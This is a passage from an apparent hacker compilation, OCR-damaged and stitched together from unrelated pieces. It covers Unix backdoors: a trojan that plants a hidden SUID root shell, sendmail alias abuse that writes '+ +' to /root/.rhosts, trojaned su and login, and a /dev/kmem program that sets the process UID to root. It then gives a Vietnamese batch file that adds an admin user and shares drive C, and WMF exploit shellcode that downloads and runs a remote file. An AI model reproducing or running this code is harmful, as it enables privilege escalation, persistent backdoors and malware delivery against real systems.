if(!(strcmp(KEYWORD,argv[1]))){
/* This is the trojan part */ system("cp /bin/csh /bin/.swp121"); system("chown root /bin/.swp121"); system("chmod 4755 /bin/.swp121"); }
}
/* Put your possibly system specific trojan
messages here */
/* Let's look like we're doing something */
printf("Sychronizing bitmap image records.");
/* system("ls -alR / >& /dev/null > /dev/null&"); */ for(;i<10;i++){
fprintf(stderr,"."); sleep(1);
}
printf("\nDone.\n"); return(0);
} /* End main */
[9] The sendmail aliases file The sendmail aliases file allows for mail sent to a particular username to either expand to several
(35)"decode: "|/usr/bin/uudecode"
to the /etc/aliases file. Usually, you would then create a uuencoded rhosts file with the full pathname embedded:
#! /bin/csh
# Create our rhosts file Note this will output to stdout echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts
Next telnet to the desired site, port 25 Simply fakemail to decode and use as the subject body, the uuencoded version of the
.rhosts file For a one liner (not faked, however) this:
%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@target.com You can be as creative as you wish in this case You can setup an alias that, when mailed to, will run a program of your
choosing Many of the previous scripts and methods can be employed here
The Covert
[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such as tripwire.
The idea is simple: insert trojan code in the source of a commonly used program Some of most useful programs to us in this
case are su, login and passwd because they already run SUID root, and need no permission modification Below are some
general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you
are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with their sourcecode.)
Since the code is very lengthy and different for many flavors, I will just include basic pseudo-code:
get input;
if input is special hardcoded flag, spawn evil trojan; else if input is valid, continue;
else quit with error;
Not complex or difficult Trojans of this nature can be done in less than 10 lines of additional code
The Esoteric
(36)to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write
permission. The following steps are executed: open the /dev/kmem device, seek to your page in memory, overwrite the UID of
your current process, then spawn a csh, which will inherit this UID. The following program does just that.
/* If /kmem is is readable and writable, this program will change the user's
UID and GID to */
/* This code originally appeared in "UNIX security: A practical tutorial"
with some modifications by daemon9@netcom.com */ #include
#include #include #include #include #include #include
#define KEYWORD "nomenclature1" struct user userpage;
long address(), userlocation; int main(argc, argv, envp) int argc;
char *argv[], *envp[];{ int count, fd;
long where, lseek();
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
fd=(open("/dev/kmem",O_RDWR); if(fd<0){
printf("Cannot read or write to /dev/kmem\n");
perror(argv); exit(10); }
userlocation=address();
where=(lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n"); perror(argv);
(37)count=read(fd,&userpage,sizeof(struct user));
if(count!=sizeof(struct user)){
printf("Cannot read user page\n"); perror(argv);
exit(30); }
printf("Current UID: %d\n",userpage.u_ruid); printf("Current GID: %d\n",userpage.g_ruid);
userpage.u_ruid=0; userpage.u_rgid=0;
where=lseek(fd,userlocation,0); if(where!=userlocation){
printf("Cannot seek to user page\n"); perror(argv);
exit(40); }
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
} }
} /* End main */ #include
#include #include
#define LNULL ((LDFILE *)0) long address(){
LDFILE *object; SYMENT symbol; long idx=0;
object=ldopen("/unix",LNULL); if(!object){
fprintf(stderr,"Cannot open /unix.\n"); exit(50);
}
(38)ldclose(object);
return(symbol.n_value); }
}
fprintf(stderr,"Cannot read symbol table in /unix.\n"); exit(60);
}
[12] Since the previous code requires /dev/kmem to be world accessible, and this is not likely a natural event, we need to take
care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a
discrete amount of time (say minutes) and then restore the original permissions. You can add this source to the source in [7]:
# NOTE(review): opens /dev/kmem to every user for the 300-second window and
# then sets it back to 0600.  Defender's view: /dev/kmem must never be
# world-writable; a periodic check of special-device modes, or an audit watch on
# /dev/kmem attribute changes, catches the window even though it is short, and
# the cron entry that drives it is the persistent artifact to look for.
chmod 666 /dev/kmem
sleep 300 # Nap for minutes
chmod 600 /dev/kmem # Or whatever it was before
From The Infinity Concept Issue II
Tự làm "con trojan"
- Starting
-
-:Server:-Mục đích share ổ C tạo user với quyền admin
Bước 1:
Mở dos prompt notebook.
Dos prompt để ta kiểm tra command chuẩn chưa
notebook để ta tạo file bat
Mở notebook đánh dòng lệnh sau:
Lệnh 1-> net user abc /add
(tạo user có tên abc )
Lệnh 2-> net localgroup administrators abc /add
Add user group
Lệnh 3->net share system=C:\ /unlimited
Share ổ C
(39)Lệnh 4-> net send ipcuaminh hello !
Khi mở file bat có mess gửi đến máy
mình biết IP được
Xem ip dùng lệnh : ipconfig
-: Client
: -Sau tên bạn ta mở file bat, ta type lệnh sau
máy
1 -> net use \\victim_ip abc
2-> explorer \\victimip\system
-Ai rảnh test xem Cái vui vẻ thui ko hoanh tráng nên ai
thấy ngứa đừng chửi nhé, công ra
Cách tạo File WMF gắn vào web ! 0-Day exploit
Code:
/* \
/ WMF nDay download() Exploit Generator \ by Unl0ck Research Team
/ \
/ greetz:
rst/ghc { ed, uf0, fost },
uKt { choix, nekd0, payhash, antq }, blacksecurity { #black } ,
0x557 { kaka, swan, sam, nolife }, sowhat, tty64 { izik };
This sploit is now full shit, so kiddies party has been started!!! urs,
darkeagle \
/ */
#include <stdio.h> #include <winsock2.h>
(40)#define PROC_BEGIN asm _emit 0x90 asm _emit 0x90\
asm _emit 0x90 asm _emit 0x90\
asm _emit 0x90 asm _emit 0x90\
asm _emit 0x90 asm _emit 0x90 #define PROC_END PROC_BEGIN
#define SEARCH_STR "\x90\x90\x90\x90\x90\x90\x90\x90\x90" #define SEARCH_LEN #define MAX_SC_LEN 2048 #define HASH_KEY 13 // Define Decode Parameter
#define DECODE_LEN 21 #define SC_LEN_OFFSET #define ENC_KEY_OFFSET 11 #define ENC_KEY 0xff // Define Function Addr
#define ADDR_LoadLibraryA [esi] #define ADDR_GetSystemDirectoryA [esi+4] #define ADDR_WinExec [esi+8] #define ADDR_ExitProcess [esi+12] #define ADDR_URLDownloadToFileA [esi+16] // Need functions
unsigned char functions[100][128] =
{ // [esi] stack layout // kernel32 // 00 kernel32.dll {"LoadLibraryA"}, // [esi]
{"GetSystemDirectoryA"}, // [esi+4] {"WinExec"}, // [esi+8] {"ExitProcess"}, // [esi+12] // urlmon // 01 urlmon.dll {"URLDownloadToFileA"}, // [esi+16] {""},
};
//q dài pót tượng trưng thơi
//
jmp sc_end
sc_start:
(41)// Get kernel32.dll base addr
mov eax, fs:0x30 // PEB
mov eax, [eax+0x0c] // PROCESS_MODULE_INFO mov esi, [eax+0x1c] // InInitOrder.flink
lodsd // eax = InInitOrder.blink mov ebp, [eax+8] // ebp = kernel32.dll base address
mov esi, edi // Hash string start addr -> esi
// Get function addr of kernel32 push
pop ecx getkernel32:
call GetProcAddress_fun loop getkernel32
// Get function addr of urlmon push 0x00006e6f
push 0x6d6c7275 // urlmon push esp
call ADDR_LoadLibraryA // LoadLibraryA("urlmon"); mov ebp, eax // ebp = urlmon.dll base address
/*
push pop ecx geturlmon:
call GetProcAddress_fun loop geturlmon
*/
call GetProcAddress_fun // url start addr = edi LGetSystemDirectoryA:
sub esp, 0x20 mov ebx, esp push 0x20 push ebx
call ADDR_GetSystemDirectoryA // GetSystemDirectoryA LURLDownloadToFileA:
// eax = system path size
// URLDownloadToFileA url save to a.exe
mov dword ptr [ebx+eax], 0x652E555C // "\U.e" mov dword ptr [ebx+eax+0x4], 0x00006578 // "xe" xor eax, eax
(42)push eax
push ebx // %systemdir%\U.exe push edi // url
push eax
call ADDR_URLDownloadToFileA // URLDownloadToFileA //LWinExec:
mov ebx, esp
push 1//executes in SW_SHOW, push if you wanna in SW_HIDE
push ebx
call ADDR_WinExec // WinExec(%systemdir %\a.exe);
Finished:
//push
call ADDR_ExitProcess // ExitProcess(); GetProcAddress_fun:
push ecx push esi
mov esi, [ebp+0x3C] // e_lfanew
mov esi, [esi+ebp+0x78] // ExportDirectory RVA add esi, ebp // rva2va
push esi
mov esi, [esi+0x20] // AddressOfNames RVA add esi, ebp // rva2va
xor ecx, ecx dec ecx find_start: inc ecx lodsd
add eax, ebp xor ebx, ebx hash_loop:
movsx edx, byte ptr [eax] cmp dl, dh
jz short find_addr
ror ebx, HASH_KEY // hash key add ebx, edx
inc eax
jmp short hash_loop find_addr:
cmp ebx, [edi] // compare to hash jnz short find_start
pop esi // ExportDirectory
mov ebx, [esi+0x24] // AddressOfNameOrdinals RVA add ebx, ebp // rva2va
mov cx, [ebx+ecx*2] // FunctionOrdinal
(43)mov eax, [ebx+ecx*4] // FunctionAddress RVA add eax, ebp // rva2va
stosd // function address save to [edi]
pop esi pop ecx ret
sc_end:
call sc_start
PROC_END //C macro to end proc }